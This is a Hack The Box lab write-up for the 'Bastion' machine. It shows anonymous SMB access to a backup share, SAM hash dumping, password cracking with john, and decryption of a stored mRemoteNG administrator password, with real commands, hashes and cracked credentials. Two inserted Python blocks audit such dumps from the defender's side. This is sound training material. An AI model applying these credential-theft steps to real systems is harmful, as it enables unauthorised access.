HTB: Bastion

Details

This machine is Bastion from Hack The Box

Recon

I started by looking for services

root@kali:~# nmap -sV -p- -T4 10.10.10.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 21:48 BST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 46.15% done; ETC: 21:49 (0:00:20 remaining)
Nmap scan report for 10.10.10.134
Host is up (0.035s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.73 seconds

User

I started on SMB

root@kali:~# smbclient -L 10.10.10.134
Enter WORKGROUP\root's password: 

Just hit enter

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    Backups         Disk
    C$              Disk      Default share
    IPC$            IPC       Remote IPC

So I mounted the backups share

root@kali:~# mount -v //10.10.10.134/Backups /tmp/mounted
Password for root@//10.10.10.134/Backups:  

I just hit enter

root@kali:/tmp/mounted# ls -la
total 29
drwxr-xr-x  2 root root  4096 Apr 16 11:02 .
drwxrwxrwt 17 root root 20480 Jun 13 21:52 ..
-r-xr-xr-x  1 root root   116 Apr 16 11:10 note.txt
-rwxr-xr-x  1 root root     0 Feb 22 12:43 SDT65CB.tmp
drwxr-xr-x  2 root root     0 Feb 22 12:44 WindowsImageBackup

I’ll take a look at this

root@kali:/tmp/mounted# cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

What's in the backup folder?

root@kali:/tmp/mounted# cd WindowsImageBackup/
root@kali:/tmp/mounted/WindowsImageBackup# ls -la
total 4
drwxr-xr-x 2 root root    0 Feb 22 12:44 .
drwxr-xr-x 2 root root 4096 Jun 13 21:56 ..
drwxr-xr-x 2 root root    0 Feb 22 12:45 L4mpje-PC

root@kali:/tmp/mounted/WindowsImageBackup/L4mpje-PC# ls -la
total 8
drwxr-xr-x 2 root root 4096 Feb 22 12:45  .
drwxr-xr-x 2 root root    0 Feb 22 12:44  ..
drwxr-xr-x 2 root root    0 Feb 22 12:45 'Backup 2019-02-22 124351'
drwxr-xr-x 2 root root    0 Feb 22 12:45  Catalog
-rwxr-xr-x 1 root root   16 Feb 22 12:44  MediaId
drwxr-xr-x 2 root root    0 Feb 22 12:45  SPPMetadataCache

root@kali:/tmp/mounted/WindowsImageBackup/L4mpje-PC# cd 'Backup 2019-02-22 124351'/

This directory had two VHD files; I mounted the larger one

root@kali:/tmp/mounted/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351

And looked inside

root@kali:/tmp/vh1# ls -la
total 2096765
drwxrwxrwx  1 root root      12288 Feb 22 12:39  .
drwxrwxrwt 21 root root      20480 Jun 13 22:06  ..
drwxrwxrwx  1 root root          0 Feb 22 12:39 '$Recycle.Bin'
-rwxrwxrwx  1 root root         24 Jun 10  2009  autoexec.bat
-rwxrwxrwx  1 root root         10 Jun 10  2009  config.sys
lrwxrwxrwx  2 root root         14 Jul 14  2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx  1 root root 2147016704 Feb 22 12:38  pagefile.sys
drwxrwxrwx  1 root root          0 Jul 14  2009  PerfLogs
drwxrwxrwx  1 root root       4096 Jul 14  2009  ProgramData
drwxrwxrwx  1 root root       4096 Apr 12  2011 'Program Files'
drwxrwxrwx  1 root root          0 Feb 22 12:39  Recovery
drwxrwxrwx  1 root root       4096 Feb 22 12:43 'System Volume Information'
drwxrwxrwx  1 root root       4096 Feb 22 12:39  Users
drwxrwxrwx  1 root root      16384 Feb 22 12:40  Windows

So I went to check the SAM file

root@kali:/tmp/vh1/Windows/System32/config# samdump2 ./SYSTEM ./SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
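Added example, not part of the original writeup: a small audit script for the pwdump-style lines that samdump2 emits. It parses `user:rid:lmhash:nthash:::` with the optional `*disabled*` prefix and reports what a defender reviewing a leaked SAM dump would want to know: which accounts have a blank password (NT hash of the empty string), which still store a real LM hash, and which enabled accounts now have an offline-crackable hash. The three sample lines are the samdump2 output shown above; the two hash constants are the well-known empty LM/NT values.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Well-known constants: LM "hash" stored when no LM hash is kept, and the NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump-style line: optional "*disabled* " prefix, then user:rid:lm:nt:::
LINE_RE = re.compile(
    r"^(?P<disabled>\*disabled\*\s+)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str
    disabled: bool

    @property
    def findings(self) -> list[str]:
        """Defender-side observations about this account's stored secrets."""
        out = []
        if self.nt == EMPTY_NT:
            out.append("blank password")
        if self.lm != EMPTY_LM:
            out.append("LM hash stored (weak, crackable)")
        if self.rid == 500 and not self.disabled:
            out.append("built-in Administrator enabled")
        if not self.disabled and self.nt != EMPTY_NT:
            out.append("enabled account: NT hash crackable offline if this dump leaks")
        return out


def parse_pwdump(text: str) -> list[Account]:
    """Parse every non-empty line; reject anything that is not pwdump format."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised pwdump line: {line!r}")
        accounts.append(Account(
            user=m["user"],
            rid=int(m["rid"]),
            lm=m["lm"].lower(),
            nt=m["nt"].lower(),
            disabled=m["disabled"] is not None,
        ))
    return accounts


def audit(text: str) -> dict[str, list[str]]:
    """Map each account name to its list of findings (empty list = nothing notable)."""
    return {a.user: a.findings for a in parse_pwdump(text)}


# The three lines samdump2 printed in the writeup above (copied from the page).
SAMPLE = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""

if __name__ == "__main__":
    for user, notes in audit(SAMPLE).items():
        print(f"{user}: {', '.join(notes) or 'nothing notable'}")
```

Run against the sample it reports the two disabled built-ins as blank-password accounts and L4mpje as the one enabled account whose hash the exposed backup hands to an offline cracker, which is exactly what the john step that follows exploits; the mitigation is to keep backup shares off anonymous access and rotate any password whose hash was in the leaked image.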

I put the L4mpje one into a file called crack.txt and set john on it

root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje     (L4mpje)
1g 0:00:00:00 DONE (2019-06-13 22:31) 1.123g/s 10556Kp/s 10556Kc/s 10556KC/s buresres..burdy1
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

The creds are

L4mpje:bureaulampje

So I tested them on ssh

root@kali:~# ssh l4mpje@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje> 

Get my flag

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
[REDACTED]

System

A file called mRemoteNG was installed, which I found contained a config file with credentials

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
[SNIP]
Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
[SNIP]

I found a tool to decrypt the password: https://github.com/kmahyyg/mremoteng-decrypt/blob/master/mremoteng_decrypt.py

root@kali:~# python3 mremoteng_decrypt.py  -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
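Added example, not part of the original writeup or the mRemoteNG project: an inventory script for a confCons.xml file, the kind of check you would run after a box like this to find out which stored credentials need rotating. It walks every node that carries a non-empty `Password` attribute and reports the connection name, protocol and account. Only the `Username`, `Domain` and `Password` attribute names come from the page; the root element, namespace, `Name`/`Type`/`Protocol`/`Hostname` attributes and the nested folder are assumptions, and the sample document and its password blobs are constructed placeholders.

```python
from __future__ import annotations
import xml.etree.ElementTree as ET

# Constructed sample in the shape of the confCons.xml quoted above. Attribute
# names other than Username/Domain/Password, and the mrng root element, are
# assumptions; the Password values are placeholders, not real blobs.
SAMPLE_XML = """\
<mrng:Connections xmlns:mrng="http://mremoteng.org" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Protocol="RDP" Hostname="127.0.0.1"
        Username="Administrator" Domain="" Password="PLACEHOLDER_BLOB_1=="/>
  <Node Name="Jump" Type="Connection" Protocol="SSH2" Hostname="127.0.0.2"
        Username="ops" Domain="CORP" Password=""/>
  <Node Name="Folder" Type="Container">
    <Node Name="Web" Type="Connection" Protocol="HTTP" Hostname="127.0.0.3"
          Username="svc_web" Domain="" Password="PLACEHOLDER_BLOB_2=="/>
  </Node>
</mrng:Connections>
"""

PRIVILEGED_NAMES = {"administrator", "root"}


def stored_credentials(xml_text: str) -> list[dict[str, str]]:
    """One record per element that carries a non-empty Password attribute.

    Nodes are matched by attribute rather than tag name so nested folders and
    namespaced roots are handled without knowing the exact schema.
    """
    root = ET.fromstring(xml_text)
    found = []
    for el in root.iter():
        if not el.get("Password"):
            continue  # no stored secret on this node (empty or absent)
        domain = el.get("Domain", "")
        user = el.get("Username", "")
        found.append({
            "name": el.get("Name", ""),
            "protocol": el.get("Protocol", ""),
            "host": el.get("Hostname", ""),
            "user": f"{domain}\\{user}" if domain else user,
        })
    return found


def privileged_entries(xml_text: str) -> list[dict[str, str]]:
    """Subset of stored credentials whose account name is a built-in admin."""
    return [
        c for c in stored_credentials(xml_text)
        if c["user"].split("\\")[-1].lower() in PRIVILEGED_NAMES
    ]


if __name__ == "__main__":
    creds = stored_credentials(SAMPLE_XML)
    print(f"{len(creds)} stored credential(s) found:")
    for c in creds:
        flag = " [PRIVILEGED]" if c in privileged_entries(SAMPLE_XML) else ""
        print(f"  {c['name']:<8} {c['protocol']:<5} {c['host']:<12} {c['user']}{flag}")
```

The script deliberately does not decrypt anything: for rotation and exposure assessment the fact that a credential is stored, and for which account, is what matters. As the writeup shows, the blob is only as protected as the master password the file was saved with, so a config file readable by a low-privilege user is equivalent to the plaintext.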

I used this on ssh

root@kali:~# ssh administrator@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>   

So I grabbed my flag

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
[REDACTED]
